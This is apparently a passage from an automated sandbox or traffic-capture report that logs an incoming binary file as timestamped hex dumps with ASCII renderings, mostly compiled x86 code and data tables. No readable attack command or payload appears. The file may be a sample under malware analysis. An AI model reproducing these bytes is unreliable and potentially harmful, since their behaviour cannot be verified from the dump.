<)t5t,0<v,a<v,A<v_p@)ujX_^USVu3W}:Mt:Mu@Au_^[]USVu3W}:Mt:Mu@Au_^[]U,MVj0EjjQQaEP`M0^U
2023-10-05 16:48:01 UTC	703	IN	Data Raw: 75 08 85 db 74 6b 57 8d 4d ff e8 5b 03 00 00 ff 75 18 ff 75 14 50 8d 45 f8 57 50 e8 ef d0 00 00 8b d0 83 c4 14 83 fa ff 74 5e 85 d2 74 51 8b 4d f8 81 f9 ff ff 00 00 76 2b 83 fb 01 76 33 81 e9 00 00 01 00 4b 8b c1 89 4d f8 c1 e8 0a 81 e1 ff 03 00 00 0d 00 d8 00 00 66 89 06 83 c6 02 81 c9 00 dc 00 00 66 89 0e 03 fa 83 c6 02 83 eb 01 75 95 8b 5d 0c 2b 75 08 d1 fe 89 3b 8b c6 eb 67 33 ff 33 c0 66 89 06 eb e9 8b 45 0c 89 38 8b 45 18 c6 40 1c 01 c7 40 18 2a 00 00 00 83 c8 ff eb 46 57 8d 4d ff 33 f6 e8 bf 02 00 00 8b 5d 18 eb 16 85 c0 74 c7 83 f8 04 75 01 46 03 f8 8d 4d ff 57 46 e8 a4 02 00 00 53 ff 75 14 50 57 6a 00 e8 3c d0 00 00 83 c4 14 83 f8 ff 75 d5 c6 43 1c 01 c7 43 18 2a 00 00 00 5f 5e 5b c9 c3 8b ff 55 8b ec 83 ec 2c 83 4d fc ff 8d 4d d4 56 57 33 f6 56 Data Ascii: utkWM[uuPEWPt^tQMv+v3KMffu]+u;g33fE8E@@FWM3]tuFMWFSuPWj<uCC_^[U,MMVW3V
2023-10-05 16:48:01 UTC	711	IN	Data Raw: c3 83 3d 60 01 50 00 ff 75 03 33 c0 c3 53 57 ff 15 f8 d9 4f 00 ff 35 60 01 50 00 8b f8 e8 e0 d0 00 00 8b d8 59 83 fb ff 74 17 85 db 75 59 6a ff ff 35 60 01 50 00 e8 02 d1 00 00 59 59 85 c0 75 04 33 db eb 42 56 6a 28 6a 01 e8 3e af 00 00 8b f0 59 59 85 f6 74 12 56 ff 35 60 01 50 00 e8 da d0 00 00 59 59 85 c0 75 12 33 db 53 ff 35 60 01 50 00 e8 c6 d0 00 00 59 59 eb 04 8b de 33 f6 56 e8 f2 d7 ff ff 59 5e 57 ff 15 18 db 4f 00 5f 8b c3 5b c3 55 8b ec 8b 45 08 85 c0 74 0e 3d 84 3a 50 00 74 07 50 e8 cd d7 ff ff 59 5d c2 04 00 55 8b ec f6 45 08 01 56 8b f1 c7 06 e8 a4 4d 00 74 0a 6a 0c 56 e8 de d1 00 00 59 59 8b c6 5e 5d c2 04 00 8b ff 55 8b ec 8b 4d 08 56 57 85 c9 74 11 8b 55 0c 85 d2 74 0a 8b 75 10 85 f6 75 18 c6 01 00 e8 66 a3 ff ff 6a 16 5e 89 30 e8 6a 1f 00 Data Ascii: =`Pu3SWO5`PYtuYj5`PYYu3BVj(j>YYtV5`PYYu3S5`PYY3VY^WO_[UEt=:PtPY]UEVMtjVYY^]UMVWtUtuufj^0j
2023-10-05 16:48:01 UTC	719	IN	Data Raw: 33 cd 5b e8 79 9c fe ff c9 c3 6a 08 68 a8 f7 4f 00 e8 1b a7 fe ff 8b 45 08 ff 30 e8 d4 ef ff ff 59 83 65 fc 00 8b 4d 0c e8 70 fd ff ff c7 45 fc fe ff ff ff e8 12 00 00 00 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b c9 c2 0c 00 8b 45 10 ff 30 e8 b6 ef ff ff 59 c3 8b ff 55 8b ec 83 7d 08 00 74 2d ff 75 08 6a 00 ff 35 3c 3d 50 00 ff 15 74 da 4f 00 85 c0 75 18 56 ff 15 f8 d9 4f 00 50 e8 e1 84 ff ff 59 8b f0 e8 90 84 ff ff 89 30 5e 5d c3 8b ff 55 8b ec 53 56 57 8b 7d 08 3b 7d 0c 74 51 8b f7 8b 1e 85 db 74 0e 8b cb ff 15 00 50 50 00 ff d3 84 c0 74 08 83 c6 08 3b 75 0c 75 e4 3b 75 0c 74 2e 3b f7 74 26 83 c6 fc 83 7e fc 00 74 13 8b 1e 85 db 74 0d 6a 00 8b cb ff 15 00 50 50 00 ff d3 59 83 ee 08 8d 46 04 3b c7 75 dd 32 c0 eb 02 b0 01 5f 5e 5b 5d c3 8b ff 55 8b ec 56 Data Ascii: 3[yjhOE0YeMpEMdY_^[E0YU}t-uj5<=PtOuVOPY0^]USVW};}tQtPPt;uu;ut.;t&~ttjPPYF;u2_^[]UV
2023-10-05 16:48:01 UTC	727	IN	Data Raw: 00 50 00 8d 4d c0 33 c1 89 45 c8 8b 45 18 89 45 cc 8b 45 0c 89 45 d0 8b 45 1c 89 45 d4 8b 45 20 89 45 d8 83 65 dc 00 83 65 e0 00 83 65 e4 00 89 65 dc 89 6d e0 64 a1 00 00 00 00 89 45 c0 8d 45 c0 64 a3 00 00 00 00 8b 45 08 ff 30 e8 af 00 01 00 59 8b 4d 08 89 01 c7 45 f8 01 00 00 00 8b 45 08 89 45 e8 8b 45 10 89 45 ec e8 04 c1 ff ff 8b 40 08 89 45 fc a1 00 50 50 00 89 45 f4 8b 4d fc ff 55 f4 8b 45 fc 89 45 f0 8d 45 e8 50 8b 45 08 ff 30 ff 55 f0 59 59 83 65 f8 00 83 7d e4 00 74 17 64 8b 1d 00 00 00 00 8b 03 8b 5d c0 89 03 64 89 1d 00 00 00 00 eb 09 8b 45 c0 64 a3 00 00 00 00 8b 45 f8 5b c9 c3 55 8b ec 8b 4d 0c 56 8b 75 08 89 0e e8 9b c0 ff ff 8b 48 24 89 4e 04 e8 90 c0 ff ff 89 70 24 8b c6 5e 5d c3 55 8b ec 56 e8 7f c0 ff ff 8b 75 08 3b 70 24 75 0e 8b 76 04 Data Ascii: PM3EEEEEEEE EeeeemdEEdE0YMEEEEE@EPPEMUEEEPE0UYYe}td]dEdE[UMVuH$Np$^]UVu;p$uv
2023-10-05 16:48:01 UTC	735	IN	Data Raw: 81 c9 00 02 00 00 89 4e 58 39 5e 60 74 31 81 c9 00 01 00 00 8d 96 a0 02 00 00 89 4e 58 66 39 1a 0f 85 d7 00 00 00 8b cf 8d 59 02 66 8b 01 83 c1 02 66 3b 85 78 ff ff ff 75 f1 e9 a6 00 00 00 39 5e 5c 74 79 8b 56 50 8d 5a 02 66 8b 02 83 c2 02 66 3b 85 78 ff ff ff 75 f1 2b d3 d1 fa 3b 56 5c 75 59 57 e8 53 03 00 00 59 85 c0 75 24 8b 5e 50 33 d2 8d 4b 02 66 8b 03 83 c3 02 66 3b c2 75 f5 ff 76 50 2b d9 d1 fb e8 7c 03 00 00 59 3b c3 74 6c 81 4e 58 00 01 00 00 8d 96 a0 02 00 00 33 c0 66 39 02 75 58 8b cf 8d 59 02 66 8b 01 83 c1 02 66 3b 85 78 ff ff ff 75 f1 eb 2a 33 db 81 c9 00 01 00 00 8d 96 a0 02 00 00 89 4e 58 66 39 1a 75 2c 8b cf 8d 59 02 66 8b 01 83 c1 02 66 3b 85 78 ff ff ff 75 f1 2b cb d1 f9 8d 41 01 50 57 6a 55 52 e8 90 f3 ff ff 83 c4 10 85 c0 75 1c 8b 46 Data Ascii: NX9^`t1NXf9Yff;xu9^\tyVPZff;xu+;V\uYWSYu$^P3Kff;uvP+\|Y;tlNX3f9uXYff;xu*3NXf9u,Yff;xu+APWjURuF
2023-10-05 16:48:01 UTC	743	IN	Data Raw: 52 e8 48 fb ff ff 53 89 45 f4 e8 88 a2 ff ff 8b 45 f4 83 c4 10 85 c0 74 62 eb 5b 8b 45 f8 8b fb 89 34 88 eb 56 38 5d ff 0f 84 2c ff ff ff f7 d8 89 45 f4 8d 50 02 3b d0 0f 82 19 ff ff ff 81 fa ff ff ff 3f 0f 83 0d ff ff ff 6a 04 52 51 e8 fb fa ff ff 53 89 45 f8 e8 3b a2 ff ff 8b 45 f8 83 c4 10 85 c0 0f 84 ed fe ff ff 8b 4d f4 8b fb 89 34 88 89 5c 88 04 a3 5c 3a 50 00 39 5d 0c 0f 84 88 00 00 00 8d 4e 01 8a 06 46 84 c0 75 f9 2b f1 6a 01 8d 46 02 50 89 45 f4 e8 a7 bd ff ff 8b f0 59 59 85 f6 75 08 53 e8 eb a1 ff ff eb 4c ff 75 08 ff 75 f4 56 e8 18 83 ff ff 83 c4 0c 85 c0 75 6f 8b 4d f0 8b c6 2b 45 08 41 03 c8 0f be 45 ff f7 d8 1b c0 23 c1 88 59 ff 50 56 e8 8c 8a 00 00 59 59 85 c0 75 1f e8 71 26 ff ff 56 c7 00 2a 00 00 00 e8 a0 a1 ff ff 83 cb ff 59 57 e8 96 a1 Data Ascii: RHSEEtb[E4V8],EP;?jRQSE;EM4\\:P9]NFu+jFPEYYuSLuuVuoM+EAE#YPVYYuq&V*YW
2023-10-05 16:48:01 UTC	750	IN	Data Raw: ec eb ff ff 8b 85 e8 eb ff ff 3b d8 72 cb 8b c7 2b 45 10 89 46 04 3b bd f4 eb ff ff 0f 82 46 ff ff ff eb 08 ff 15 f8 d9 4f 00 89 06 8b 4d fc 8b c6 5f 5e 33 cd 5b e8 46 1f fe ff c9 c3 8b ff 55 8b ec 5d e9 00 00 00 00 8b ff 55 8b ec 8b 45 08 56 85 c0 75 18 e8 c2 07 ff ff c7 00 16 00 00 00 e8 c5 83 ff ff 83 c8 ff e9 67 01 00 00 8b 40 0c 53 90 33 db c1 e8 0d 43 84 c3 0f 84 50 01 00 00 8b 45 08 8b 40 0c 90 c1 e8 0c 84 c3 0f 85 3e 01 00 00 8b 45 08 8b 40 0c 90 d1 e8 84 c3 8b 45 08 74 0e 6a 10 59 83 c0 0c f0 09 08 e9 20 01 00 00 83 c0 0c f0 09 18 8b 45 08 8b 40 0c 90 a9 c0 04 00 00 75 09 ff 75 08 e8 c8 4e 00 00 59 8b 45 08 57 8b 48 04 89 08 8b 45 08 50 8b 70 18 8b 78 04 e8 e6 9a ff ff 56 57 50 e8 e7 08 00 00 8b 4d 08 83 c4 10 89 41 08 8b 45 08 5f 8b 50 08 85 d2 Data Ascii: ;r+EF;FOM_^3[FU]UEVug@S3CPE@>E@EtjY E@uuNYEWHEPpxVWPMAE_P
2023-10-05 16:48:01 UTC	758	IN	Data Raw: d8 e8 fe ff c7 00 16 00 00 00 e8 db 64 ff ff 33 c0 e9 20 01 00 00 83 7d 0c 00 74 e3 56 8b 75 10 33 c0 66 89 07 85 f6 75 17 e8 ae e8 fe ff c7 00 16 00 00 00 e8 b1 64 ff ff 33 c0 e9 f5 00 00 00 ff 75 1c 8d 4d e4 e8 4f 7d fe ff 83 7d 18 00 75 0c 8b 45 e8 8b 80 9c 00 00 00 89 45 18 8b 45 0c 8b cf 53 89 4d f8 33 db 89 45 fc 0f b7 16 66 85 d2 0f 84 81 00 00 00 83 fa 25 74 15 66 89 11 8b 4d f8 8b 45 fc 83 c1 02 48 89 4d f8 89 45 fc eb 5c 39 5d 14 74 7c 83 c6 02 88 5d f4 0f b7 06 8b c8 83 f8 23 75 0a 83 c6 02 c6 45 f4 01 0f b7 0e 66 83 f9 45 74 09 0f b7 c1 66 83 f9 4f 75 06 83 c6 02 0f b7 06 ff 75 f4 8d 4d fc ff 75 18 51 8d 4d f8 51 ff 75 14 50 8d 45 e8 50 e8 ab 02 00 00 83 c4 1c 84 c0 8b 45 fc 74 1f 8b 4d f8 83 c6 02 85 c0 0f 85 73 ff ff ff 85 c0 74 3d 8b 5d 0c Data Ascii: d3 }tVu3fud3uMO}}uEEESM3Ef%tfMEHME\9]t\|]#uEfEtfOuuMuQMQuPEPEtMst=]
2023-10-05 16:48:01 UTC	766	IN	Data Raw: ff 50 8d 85 60 fc ff ff 89 9d 5c fc ff ff 56 50 89 9d 8c fa ff ff e8 be 5d fe ff 83 c4 10 e9 ca 03 00 00 8d 8a ce fb ff ff 8b f7 8b c1 33 d2 83 e1 1f c1 e8 05 2b f1 89 85 ac f8 ff ff 89 8d 9c f8 ff ff 8b c3 8b ce 89 b5 80 f8 ff ff e8 df 60 ff ff 8b 95 b8 f8 ff ff 48 83 a5 90 f8 ff ff 00 89 85 b0 f8 ff ff f7 d0 89 85 84 f8 ff ff 8b 8c 95 2c fe ff ff 0f bd c1 74 09 40 89 85 b8 f8 ff ff eb 07 83 a5 b8 f8 ff ff 00 8b 8d ac f8 ff ff be cc 01 00 00 8d 04 11 83 f8 73 76 2b 33 c0 50 89 85 8c fa ff ff 89 85 2c fe ff ff 8d 85 90 fa ff ff 50 8d 85 30 fe ff ff 56 50 e8 19 5d fe ff 83 c4 10 e9 e2 00 00 00 2b bd b8 f8 ff ff 3b bd 9c f8 ff ff 1b c0 f7 d8 03 c1 03 c2 89 85 88 f8 ff ff 83 f8 73 77 b6 8d 79 ff 48 89 bd 98 f8 ff ff 89 85 b4 f8 ff ff 3b c7 0f 84 91 00 00 00 Data Ascii: P`\VP]3+`H,t@sv+3P,P0VP]+;swyH;
2023-10-05 16:48:01 UTC	774	IN	Data Raw: c3 8b 65 e8 e8 a9 c0 fe ff cc 55 8b ec 83 ec 64 53 56 57 8b 7d 18 33 c0 57 ff 75 14 89 45 f0 ff 75 0c 88 45 e8 e8 a1 28 00 00 8b c8 83 c4 0c 89 4d f8 83 f9 ff 0f 8c 6e 03 00 00 3b 4f 04 0f 8d 65 03 00 00 8b 5d 08 81 3b 63 73 6d e0 0f 85 f7 00 00 00 83 7b 10 03 0f 85 ed 00 00 00 81 7b 14 20 05 93 19 74 16 81 7b 14 21 05 93 19 74 0d 81 7b 14 22 05 93 19 0f 85 ce 00 00 00 33 f6 39 73 1c 0f 85 c3 00 00 00 e8 67 05 ff ff 39 70 10 0f 84 ae 02 00 00 e8 59 05 ff ff 8b 58 10 e8 51 05 ff ff c6 45 e8 01 8b 40 14 89 45 fc 85 db 0f 84 f5 02 00 00 81 3b 63 73 6d e0 75 2a 83 7b 10 03 75 24 81 7b 14 20 05 93 19 74 12 81 7b 14 21 05 93 19 74 09 81 7b 14 22 05 93 19 75 09 39 73 1c 0f 84 c3 02 00 00 e8 08 05 ff ff 39 70 1c 74 62 e8 fe 04 ff ff 8b 40 1c 89 45 f4 e8 f3 04 ff Data Ascii: eUdSVW}3WuEuE(Mn;Oe];csm{{ t{!t{"39sg9pYXQE@E;csmu*{u${ t{!t{"u9s9ptb@E
2023-10-05 16:48:01 UTC	782	IN	Data Raw: 50 00 48 0b 50 00 c7 05 04 40 50 00 50 0b 50 00 c3 6a 08 68 00 fb 4f 00 e8 14 ad fd ff a1 0c 40 50 00 90 85 c0 75 2e 6a 06 e8 c6 f5 fe ff 59 83 65 fc 00 a1 0c 40 50 00 90 85 c0 75 0c e8 18 05 00 00 f0 ff 05 0c 40 50 00 c7 45 fc fe ff ff ff e8 10 00 00 00 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b c9 c3 6a 06 e8 9f f5 fe ff 59 c3 8b ff 55 8b ec 51 51 57 bf 54 be 4f 00 8d 45 fc 57 68 00 01 00 00 ff 75 08 50 e8 c7 c1 fe ff 83 c4 10 85 c0 75 05 8b 45 08 eb 49 83 f8 22 74 04 33 c0 eb 40 8b 45 fc 03 c0 56 50 e8 f4 0e ff ff 8b f0 59 85 f6 75 0a 50 e8 9c 05 ff ff 33 c0 eb 21 57 ff 75 fc 8d 45 f8 56 50 e8 87 c1 fe ff 83 c4 10 85 c0 74 03 56 eb df 6a 00 e8 79 05 ff ff 8b c6 59 5e 5f c9 c3 8b ff 55 8b ec 6a 20 ff 75 08 6a 40 ff 75 0c e8 0d 38 ff ff 83 c4 10 85 c0 75 Data Ascii: PHP@PPPjhO@Pu.jYe@Pu@PEMdY_^[jYUQQWTOEWhuPuEI"t3@EVPYuP3!WuEVPtVjyY^_Uj uj@u8u
2023-10-05 16:48:01 UTC	789	IN	Data Raw: ff ff dd 55 dc d9 ee 81 fa ce fb ff ff 7d 0a 33 c0 de c9 40 e9 f3 00 00 00 de d9 df e0 f6 c4 41 75 0d c7 45 f4 01 00 00 00 c6 45 ff 01 eb 09 83 65 f4 00 32 c0 88 45 ff 8b 45 e2 32 c9 83 e0 0f c6 45 fe 00 83 c8 10 89 4d ec 66 89 45 e2 b8 03 fc ff ff 3b d0 7d 42 89 7d f8 2b c2 8b 7d dc 8b 5d f8 8b cf 83 e1 01 89 4d ec 74 09 85 db 75 01 43 c6 45 fe 01 d1 ef f6 45 e0 01 89 7d dc 74 09 81 cf 00 00 00 80 89 7d dc d1 6d e0 83 e8 01 75 d1 89 5d f8 8b 5d 08 eb 03 8b 7d dc 83 7d f4 00 dd 45 dc 74 0d d9 e0 dd 55 f0 dd 55 dc 8b 7d dc eb 03 dd 55 f0 84 c9 75 05 38 4d fe 74 4b dd d8 e8 5d 02 ff ff 85 c0 74 1c 3d 00 01 00 00 74 0e 3d 00 02 00 00 75 2f 8a 45 ff 34 01 eb 03 8a 45 ff 84 c0 eb 10 80 7d ec 00 74 1b 80 7d fe 00 75 06 f6 45 dc 01 74 0f 83 c7 01 89 7d dc 83 55 Data Ascii: U}3@AuEEe2EE2EMfE;}B}+}]MtuCEE}t}mu]]}}EtUU}Uu8MtK]t=t=u/E4E}t}uEt}U
2023-10-05 16:48:01 UTC	797	IN	Data Raw: 00 8b 4e 41 00 8b 4e 41 00 8b 4e 41 00 8b 4e 41 00 8b 4e 41 00 8b 4e 41 00 a2 4e 41 00 ab 3d 41 00 ad 4e 41 00 8b 4e 41 00 8b 4e 41 00 8b 4e 41 00 8b 4e 41 00 8b 4e 41 00 8b 4e 41 00 8b 4e 41 00 24 4f 41 00 8b 4e 41 00 8b 4e 41 00 8b 4e 41 00 8b 4e 41 00 8b 4e 41 00 8b 4e 41 00 8b 4e 41 00 8b 4e 41 00 8b 4e 41 00 8b 4e 41 00 b8 4e 41 00 cb 4e 41 00 db 4d 41 00 c9 4f 41 00 e4 4f 41 00 d0 45 41 00 2b 50 41 00 46 50 41 00 61 50 41 00 7a 50 41 00 c2 50 41 00 d0 45 41 00 f2 50 41 00 d0 45 41 00 1e 51 41 00 45 51 41 00 d0 45 41 00 d0 45 41 00 d0 45 41 00 6c 51 41 00 d0 45 41 00 9f 51 41 00 e5 51 41 00 a0 47 41 00 b7 47 41 00 cd 47 41 00 25 47 41 00 b3 48 41 00 e4 47 41 00 fa 47 41 00 21 48 41 00 25 47 41 00 2e 48 41 00 3b 48 41 00 61 48 41 00 87 48 41 00 25 47 Data Ascii: NANANANANANANA=ANANANANANANANANA$OANANANANANANANANANANANANAMAOAOAEA+PAFPAaPAzPAPAEAPAEAQAEQAEAEAEAlQAEAQAQAGAGAGA%GAHAGAGA!HA%GA.HA;HAaHAHA%G
2023-10-05 16:48:01 UTC	805	IN	Data Raw: 00 00 00 00 00 50 1b 00 00 6a 1b 00 00 00 00 00 00 6b 1b 00 00 73 1b 00 00 11 00 00 00 74 1b 00 00 7e 1b 00 00 00 00 00 00 80 1b 00 00 81 1b 00 00 11 00 00 00 82 1b 00 00 a1 1b 00 00 00 00 00 00 a2 1b 00 00 a5 1b 00 00 11 00 00 00 a6 1b 00 00 a7 1b 00 00 00 00 00 00 a8 1b 00 00 a9 1b 00 00 11 00 00 00 aa 1b 00 00 aa 1b 00 00 00 00 00 00 ab 1b 00 00 ad 1b 00 00 11 00 00 00 ae 1b 00 00 e5 1b 00 00 00 00 00 00 e6 1b 00 00 e6 1b 00 00 11 00 00 00 e7 1b 00 00 e7 1b 00 00 00 00 00 00 e8 1b 00 00 e9 1b 00 00 11 00 00 00 ea 1b 00 00 ec 1b 00 00 00 00 00 00 ed 1b 00 00 ed 1b 00 00 11 00 00 00 ee 1b 00 00 ee 1b 00 00 00 00 00 00 ef 1b 00 00 f1 1b 00 00 11 00 00 00 f2 1b 00 00 f3 1b 00 00 00 00 00 00 fc 1b 00 00 2b 1c 00 00 00 00 00 00 2c 1c 00 00 33 1c 00 00 11 00 Data Ascii: Pjkst~+,3
2023-10-05 16:48:01 UTC	813	IN	Data Raw: 00 9c bc 01 00 00 00 00 00 9d bc 01 00 9e bc 01 00 11 00 00 00 9f bc 01 00 9f bc 01 00 00 00 00 00 a0 bc 01 00 a3 bc 01 00 12 00 00 00 00 cf 01 00 2d cf 01 00 11 00 00 00 30 cf 01 00 46 cf 01 00 11 00 00 00 50 cf 01 00 c3 cf 01 00 00 00 00 00 00 d0 01 00 f5 d0 01 00 00 00 00 00 00 d1 01 00 26 d1 01 00 00 00 00 00 29 d1 01 00 66 d1 01 00 00 00 00 00 67 d1 01 00 69 d1 01 00 11 00 00 00 6a d1 01 00 72 d1 01 00 00 00 00 00 73 d1 01 00 7a d1 01 00 12 00 00 00 7b d1 01 00 82 d1 01 00 11 00 00 00 83 d1 01 00 84 d1 01 00 00 00 00 00 85 d1 01 00 8b d1 01 00 11 00 00 00 8c d1 01 00 a9 d1 01 00 00 00 00 00 aa d1 01 00 ad d1 01 00 11 00 00 00 ae d1 01 00 e8 d1 01 00 00 00 00 00 42 d2 01 00 44 d2 01 00 11 00 00 00 e0 d2 01 00 f3 d2 01 00 00 00 00 00 60 d3 01 00 78 d3 Data Ascii: -0FP&)fgijrsz{BD`x
2023-10-05 16:48:01 UTC	821	IN	Data Raw: 00 d9 a9 41 00 26 a9 41 00 fb a9 41 00 da ad 41 00 da ad 41 00 20 b1 41 00 a3 ae 41 00 a3 ae 41 00 da ad 41 00 da ad 41 00 20 b1 41 00 11 ae 41 00 3e ae 41 00 19 af 41 00 a3 ae 41 00 a3 ae 41 00 a3 ae 41 00 a3 ae 41 00 a3 ae 41 00 a3 ae 41 00 2f ae 41 00 18 b0 41 00 fc ad 41 00 49 b0 41 00 38 c1 41 00 38 c1 41 00 38 c1 41 00 60 b0 41 00 74 b0 41 00 1d c7 41 00 0a ca 41 00 13 cd 41 00 13 cd 41 00 13 cd 41 00 13 cd 41 00 13 cd 41 00 9b ca 41 00 13 cd 41 00 13 cd 41 00 13 cd 41 00 13 cd 41 00 13 cd 41 00 13 cd 41 00 13 cd 41 00 30 cb 41 00 13 cd 41 00 13 cd 41 00 1d c7 41 00 9b cb 41 00 a4 cb 41 00 13 cd 41 00 13 cd 41 00 1d c7 41 00 13 cd 41 00 1d c7 41 00 7b d2 41 00 f2 d2 41 00 f2 d2 41 00 f2 d2 41 00 f2 d2 41 00 9a d2 41 00 f2 d2 41 00 f2 d2 41 00 f2 d2 Data Ascii: A&AAAA AAAAA AA>AAAAAAAA/AAAIA8A8A8A`AtAAAAAAAAAAAAAAAA0AAAAAAAAAAA{AAAAAAAA
2023-10-05 16:48:01 UTC	828	IN	Data Raw: 00 01 00 00 00 02 00 00 00 01 00 00 00 01 00 00 00 03 00 00 00 03 00 00 00 02 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00 02 00 00 00 03 00 00 00 03 00 00 00 03 00 00 00 02 00 00 00 03 00 00 00 03 00 00 00 01 00 00 00 01 00 00 00 02 00 00 00 02 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 02 00 00 00 04 00 00 00 04 00 00 00 03 00 00 00 02 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 02 00 00 00 02 00 00 00 04 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 03 00 00 00 02 00 00 00 03 00 00 00 03 00 00 00 03 00 00 00 03 00 00 00 03 00 00 00 01 00 00 00 03 00 00 00 01 00 00 00 01 00 00 00 03 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 Data Ascii:
2023-10-05 16:48:01 UTC	836	IN	Data Raw: 00 29 01 c9 1e 11 01 f1 1e f2 00 f3 00 f4 00 f5 00 cf 1e cd 1e e5 1e f9 00 fa 00 69 01 e7 1e fd 00 e3 1e ee 1e a0 00 a1 00 a2 00 a3 00 fd ff a5 00 fd ff a7 00 a4 00 a9 00 aa 00 ab 00 fd ff fd ff fd ff fd ff b0 00 b1 00 b2 00 b3 00 fd ff b5 00 b6 00 b7 00 fd ff b9 00 ba 00 bb 00 bc 00 bd 00 fd ff bf 00 c0 00 c1 00 c2 00 c3 00 c4 00 c5 00 c6 00 c7 00 c8 00 c9 00 ca 00 cb 00 cc 00 cd 00 ce 00 cf 00 fd ff d1 00 d2 00 d3 00 d4 00 d5 00 d6 00 52 01 d8 00 d9 00 da 00 db 00 dc 00 78 01 fd ff df 00 e0 00 e1 00 e2 00 e3 00 e4 00 e5 00 e6 00 e7 00 e8 00 e9 00 ea 00 eb 00 ec 00 ed 00 ee 00 ef 00 fd ff f1 00 f2 00 f3 00 f4 00 f5 00 f6 00 53 01 f8 00 f9 00 fa 00 fb 00 fc 00 ff 00 fd ff fd ff c7 00 fc 00 e9 00 e2 00 e4 00 e0 00 05 01 e7 00 ea 00 eb 00 e8 00 ef 00 ee 00 Data Ascii: )iRxS
2023-10-05 16:48:01 UTC	844	IN	Data Raw: 00 33 84 4e 00 33 84 4e 00 91 83 4e 00 e5 84 4e 00 7e 82 4e 00 aa a8 4e 00 c9 85 4e 00 90 87 4e 00 66 82 4e 00 83 85 4e 00 f3 a7 4e 00 1c 1e 4e 00 1c 1e 4e 00 1c 1e 4e 00 1c 1e 4e 00 1c 1e 4e 00 1c 1e 4e 00 1c 1e 4e 00 6a 8a 4e 00 85 89 4e 00 41 a8 4e 00 5c 81 4e 00 29 af 4e 00 55 af 4e 00 ef 8d 4e 00 d9 a6 4e 00 4d 82 4e 00 9c 85 4e 00 7d a8 4e 00 50 ee 44 00 70 ee 44 00 f0 ee 44 00 30 ef 44 00 90 ef 44 00 b0 ef 44 00 a0 f0 44 00 00 00 00 00 d0 f0 44 00 00 f1 44 00 60 f1 44 00 b0 f1 44 00 d0 f1 44 00 f0 f1 44 00 50 f2 44 00 70 c4 42 00 60 f2 44 00 74 4f 4d 00 94 4f 4d 00 d8 4f 4d 00 58 51 4d 00 90 f3 44 00 f0 f3 44 00 80 fe 44 00 c0 fe 44 00 a0 72 42 00 ff ff ff ff 00 03 45 00 70 03 45 00 a0 72 42 00 90 03 45 00 b0 03 45 00 d0 03 45 00 e0 03 45 00 f0 03 Data Ascii: 3N3NNN~NNNNfNNNNNNNNNNjNNAN\N)NUNNNMNN}NPDpDD0DDDDDD`DDDDPDpB`DtOMOMOMXQMDDDDrBEpErBEEEE
2023-10-05 16:48:02 UTC	852	IN	Data Raw: ef b1 75 85 e9 02 23 26 dc 88 1b 65 eb 81 3e 89 23 c5 ac 96 d3 f3 6f 6d 0f 39 42 f4 83 82 44 0b 2e 04 20 84 a4 4a f0 c8 69 5e 9b 1f 9e 42 68 c6 21 9a 6c e9 f6 61 9c 0c 67 f0 88 d3 ab d2 a0 51 6a 68 2f 54 d8 28 a7 0f 96 a3 33 51 ab 6c 0b ef 6e e4 3b 7a 13 50 f0 3b ba 98 2a fb 7e 1d 65 f1 a1 76 01 af 39 3e 59 ca 66 88 0e 43 82 19 86 ee 8c b4 9f 6f 45 c3 a5 84 7d be 5e 8b 3b d8 75 6f e0 73 20 c1 85 9f 44 1a 40 a6 6a c1 56 62 aa d3 4e 06 77 3f 36 72 df fe 1b 3d 02 9b 42 24 d7 d0 37 48 12 0a d0 d3 ea 0f db 9b c0 f1 49 c9 72 53 07 7b 1b 99 80 d8 79 d4 25 f7 de e8 f6 1a 50 fe e3 3b 4c 79 b6 bd e0 6c 97 ba 06 c0 04 b6 4f a9 c1 c4 60 9f 40 c2 9e 5c 5e 63 24 6a 19 af 6f fb 68 b5 53 6c 3e eb b2 39 13 6f ec 52 3b 1f 51 fc 6d 2c 95 30 9b 44 45 81 cc 09 bd 5e af 04 d0 Data Ascii: u#&e>#om9BD. Ji^Bh!lagQjh/T(3Qln;zP;*~ev9>YfCoE}^;uos D@jVbNw?6r=B$7HIrS{y%P;LylO`@\^c$johSl>9oR;Qm,0DE^
2023-10-05 16:48:02 UTC	860	IN	Data Raw: 00 90 a7 48 00 b0 a7 48 00 e0 aa 48 00 f0 aa 48 00 10 ab 48 00 80 af 48 00 a0 af 48 00 80 b7 48 00 10 b8 48 00 20 b8 48 00 20 b9 48 00 60 b9 48 00 70 b9 48 00 a7 30 4e 00 5e c2 4e 00 f4 7e 4d 00 01 00 00 00 20 74 4d 00 1c 81 4d 00 02 00 00 00 24 81 4d 00 03 00 00 00 30 81 4d 00 01 00 00 00 f2 30 4e 00 3d c5 4e 00 10 9d 48 00 a0 9d 48 00 30 9e 48 00 a0 a3 48 00 20 a4 48 00 40 a4 48 00 70 a4 48 00 a0 a4 48 00 d0 a4 48 00 f0 a4 48 00 70 a7 48 00 90 a7 48 00 b0 a7 48 00 e0 aa 48 00 f0 aa 48 00 10 ab 48 00 80 af 48 00 a0 af 48 00 80 b7 48 00 10 b8 48 00 20 b8 48 00 20 b9 48 00 60 b9 48 00 70 b9 48 00 f2 30 4e 00 31 c5 4e 00 88 7f 4d 00 01 00 00 00 b0 74 4d 00 1c 81 4d 00 02 00 00 00 24 81 4d 00 03 00 00 00 30 81 4d 00 01 00 00 00 3d 31 4e 00 15 cd 4e 00 10 9d Data Ascii: HHHHHHHHH H H`HpH0N^N~M tMM$M0M0N=NHH0HH H@HpHHHHpHHHHHHHHHH H H`HpH0N1NMtMM$M0M=1NN
